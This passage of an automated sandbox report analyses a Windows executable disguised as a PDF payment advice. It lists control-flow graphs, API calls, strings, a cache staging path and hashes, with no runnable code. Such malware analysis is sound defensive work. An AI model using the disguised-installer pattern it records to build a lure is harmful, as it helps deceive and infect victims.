                                                                                                                                    • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                    • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                                    • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                    • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 700 406077-406082 701 406084-406093 700->701 702 406095-4060ab 700->702 701->702 703 4060b1-4060be 702->703 704 4062c3-4062c9 702->704 703->704 707 4060c4-4060cb 703->707 705 4060d0-4060dd 704->705 706 4062cf-4062da 704->706 705->706 710 4060e3-4060ef 705->710 708 4062e5-4062e6 706->708 709 4062dc-4062e0 call 406055 706->709 707->704 709->708 712 4062b0 710->712 713 4060f5-406131 710->713 714 4062b2-4062bc 712->714 715 4062be-4062c1 712->715 716 406251-406255 713->716 717 406137-406142 GetVersion 713->717 714->704 715->704 718 406257-40625b 716->718 719 40628a-40628e 716->719 720 406144-406148 717->720 721 40615c 717->721 722 40626b-406278 call 406055 718->722 723 40625d-406269 call 405f9c 718->723 725 406290-406298 call 406077 719->725 726 40629d-4062ae lstrlenW 719->726 720->721 727 40614a-40614e 720->727 724 406163-40616a 721->724 738 40627d-406286 722->738 723->738 730 40616c-40616e 724->730 731 40616f-406171 724->731 725->726 726->704 727->721 728 406150-406154 727->728 728->721 734 406156-40615a 728->734 730->731 736 406173-406199 call 405f22 731->736 737 4061ad-4061b0 731->737 734->724 748 406238-40623c 736->748 749 40619f-4061a8 call 406077 736->749 741 4061c0-4061c3 737->741 742 4061b2-4061be GetSystemDirectoryW 737->742 738->726 740 406288 738->740 744 406249-40624f call 4062e9 740->744 746 4061c5-4061d3 GetWindowsDirectoryW 741->746 747 40622e-406230 741->747 745 406232-406236 742->745 744->726 745->744 745->748 746->747 747->745 750 4061d5-4061df 747->750 748->744 755 40623e-406244 lstrcatW 748->755 749->745 752 4061e1-4061e4 750->752 753 4061f9-40620f SHGetSpecialFolderLocation 750->753 752->753 757 4061e6-4061ed 752->757 758 406211-406228 SHGetPathFromIDListW CoTaskMemFree 753->758 759 40622a 753->759 755->744 761 4061f5-4061f7 757->761 758->745 758->759 759->747 761->745 761->753
                                                                                                                                    APIs
                                                                                                                                    • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040613A
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B8
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061CB
                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                                    • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                                    • lstrlenW.KERNEL32(Call,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040629E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                    • API String ID: 900638850-1230650788
                                                                                                                                    • Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                                                    • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                                                    • Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                                                    • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 762 405846-40586c call 405b11 765 405885-40588c 762->765 766 40586e-405880 DeleteFileW 762->766 768 40588e-405890 765->768 769 40589f-4058af call 406055 765->769 767 405a02-405a06 766->767 770 4059b0-4059b5 768->770 771 405896-405899 768->771 777 4058b1-4058bc lstrcatW 769->777 778 4058be-4058bf call 405a55 769->778 770->767 774 4059b7-4059ba 770->774 771->769 771->770 775 4059c4-4059cc call 406398 774->775 776 4059bc-4059c2 774->776 775->767 786 4059ce-4059e2 call 405a09 call 4057fe 775->786 776->767 780 4058c4-4058c8 777->780 778->780 782 4058d4-4058da lstrcatW 780->782 783 4058ca-4058d2 780->783 785 4058df-4058fb lstrlenW FindFirstFileW 782->785 783->782 783->785 787 405901-405909 785->787 788 4059a5-4059a9 785->788 802 4059e4-4059e7 786->802 803 4059fa-4059fd call 4051b4 786->803 790 405929-40593d call 406055 787->790 791 40590b-405913 787->791 788->770 793 4059ab 788->793 804 405954-40595f call 4057fe 790->804 805 40593f-405947 790->805 794 405915-40591d 791->794 795 405988-405998 FindNextFileW 791->795 793->770 794->790 798 40591f-405927 794->798 795->787 801 40599e-40599f FindClose 795->801 798->790 798->795 801->788 802->776 807 4059e9-4059f8 call 4051b4 call 405ef6 802->807 803->767 813 405980-405983 call 4051b4 804->813 814 405961-405964 804->814 805->795 808 405949-405952 call 405846 805->808 807->767 808->795 813->795 817 405966-405976 call 4051b4 call 405ef6 814->817 818 405978-40597e 814->818 817->795 818->795
                                                                                                                                    APIs
                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"), ref: 0040586F
                                                                                                                                    • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"), ref: 004058B7
                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"), ref: 004058DA
                                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"), ref: 004058E0
                                                                                                                                    • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"), ref: 004058F0
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                                    Strings
                                                                                                                                    • \*.*, xrefs: 004058B1
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
                                                                                                                                    • "C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe", xrefs: 0040584F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                    • String ID: "C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                    • API String ID: 2035342205-4225328645
                                                                                                                                    • Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                                                    • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                                                    • Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                                                    • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                                                    APIs
                                                                                                                                    • CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 00402154
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInstance
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving
                                                                                                                                    • API String ID: 542301482-2168965836
                                                                                                                                    • Opcode ID: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                                                    • Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
                                                                                                                                    • Opcode Fuzzy Hash: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                                                    • Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNELBASE(74DF3420,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004063AF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                    • Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                                                    • Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
                                                                                                                                    • Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                                                    • Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                    • Opcode ID: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                                                    • Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
                                                                                                                                    • Opcode Fuzzy Hash: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                                                    • Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 257 403c41-403c53 258 403d94-403da3 257->258 259 403c59-403c5f 257->259 261 403df2-403e07 258->261 262 403da5-403ded GetDlgItem * 2 call 404119 SetClassLongW call 40140b 258->262 259->258 260 403c65-403c6e 259->260 265 403c70-403c7d SetWindowPos 260->265 266 403c83-403c86 260->266 263 403e47-403e4c call 404165 261->263 264 403e09-403e0c 261->264 262->261 276 403e51-403e6c 263->276 268 403e0e-403e19 call 401389 264->268 269 403e3f-403e41 264->269 265->266 271 403ca0-403ca6 266->271 272 403c88-403c9a ShowWindow 266->272 268->269 290 403e1b-403e3a SendMessageW 268->290 269->263 275 4040e6 269->275 277 403cc2-403cc5 271->277 278 403ca8-403cbd DestroyWindow 271->278 272->271 283 4040e8-4040ef 275->283 281 403e75-403e7b 276->281 282 403e6e-403e70 call 40140b 276->282 286 403cc7-403cd3 SetWindowLongW 277->286 287 403cd8-403cde 277->287 284 4040c3-4040c9 278->284 293 403e81-403e8c 281->293 294 4040a4-4040bd DestroyWindow EndDialog 281->294 282->281 284->275 291 4040cb-4040d1 284->291 286->283 288 403d81-403d8f call 404180 287->288 289 403ce4-403cf5 GetDlgItem 287->289 288->283 295 403d14-403d17 289->295 296 403cf7-403d0e SendMessageW IsWindowEnabled 289->296 290->283 291->275 298 4040d3-4040dc ShowWindow 291->298 293->294 299 403e92-403edf call 406077 call 404119 * 3 GetDlgItem 293->299 294->284 300 403d19-403d1a 295->300 301 403d1c-403d1f 295->301 296->275 296->295 298->275 327 403ee1-403ee6 299->327 328 403ee9-403f25 ShowWindow KiUserCallbackDispatcher call 40413b EnableWindow 299->328 304 403d4a-403d4f call 4040f2 300->304 305 403d21-403d27 301->305 306 403d2d-403d32 301->306 304->288 309 403d68-403d7b SendMessageW 305->309 310 403d29-403d2b 305->310 306->309 311 403d34-403d3a 306->311 309->288 310->304 315 403d51-403d5a call 40140b 311->315 316 403d3c-403d42 call 40140b 311->316 315->288 324 403d5c-403d66 315->324 325 403d48 316->325 324->325 325->304 327->328 331 403f27-403f28 328->331 332 403f2a 328->332 333 403f2c-403f5a GetSystemMenu EnableMenuItem SendMessageW 331->333 332->333 334 403f5c-403f6d SendMessageW 333->334 335 403f6f 333->335 336 403f75-403fb3 call 40414e call 406055 lstrlenW call 406077 SetWindowTextW call 401389 334->336 335->336 336->276 345 403fb9-403fbb 336->345 345->276 346 403fc1-403fc5 345->346 347 403fe4-403ff8 DestroyWindow 346->347 348 403fc7-403fcd 346->348 347->284 350 403ffe-40402b CreateDialogParamW 347->350 348->275 349 403fd3-403fd9 348->349 349->276 351 403fdf 349->351 350->284 352 404031-404088 call 404119 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 350->352 351->275 352->275 357 40408a-4040a2 ShowWindow call 404165 352->357 357->284
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                                    • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                                    • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                                    • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                                    • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3282139019-0
                                                                                                                                    • Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                                                    • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                                                    • Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                                                    • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 360 40389e-4038b6 call 40642b 363 4038b8-4038c3 GetUserDefaultUILanguage call 405f9c 360->363 364 4038ca-403901 call 405f22 360->364 367 4038c8 363->367 370 403903-403914 call 405f22 364->370 371 403919-40391f lstrcatW 364->371 369 403924-40394d call 403b74 call 405b11 367->369 377 403953-403958 369->377 378 4039df-4039e7 call 405b11 369->378 370->371 371->369 377->378 379 40395e-403986 call 405f22 377->379 384 4039f5-403a1a LoadImageW 378->384 385 4039e9-4039f0 call 406077 378->385 379->378 386 403988-40398c 379->386 388 403a9b-403aa3 call 40140b 384->388 389 403a1c-403a4c RegisterClassW 384->389 385->384 390 40399e-4039aa lstrlenW 386->390 391 40398e-40399b call 405a36 386->391 402 403aa5-403aa8 388->402 403 403aad-403ab8 call 403b74 388->403 392 403a52-403a96 SystemParametersInfoW CreateWindowExW 389->392 393 403b6a 389->393 397 4039d2-4039da call 405a09 call 406055 390->397 398 4039ac-4039ba lstrcmpiW 390->398 391->390 392->388 396 403b6c-403b73 393->396 397->378 398->397 401 4039bc-4039c6 GetFileAttributesW 398->401 405 4039c8-4039ca 401->405 406 4039cc-4039cd call 405a55 401->406 402->396 412 403b41-403b49 call 405287 403->412 413 403abe-403ad8 ShowWindow call 4063bf 403->413 405->397 405->406 406->397 420 403b63-403b65 call 40140b 412->420 421 403b4b-403b51 412->421 418 403ae4-403af6 GetClassInfoW 413->418 419 403ada-403adf call 4063bf 413->419 425 403af8-403b08 GetClassInfoW RegisterClassW 418->425 426 403b0e-403b31 DialogBoxParamW call 40140b 418->426 419->418 420->393 421->402 422 403b57-403b5e call 40140b 421->422 422->402 425->426 430 403b36-403b3f call 4037ee 426->430 430->396
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                      • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                    • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"), ref: 004038B8
                                                                                                                                      • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                    • lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"), ref: 0040391F
                                                                                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
                                                                                                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                                    • GetFileAttributesW.KERNEL32(Call), ref: 004039BD
                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving), ref: 00403A06
                                                                                                                                    • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                                    • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
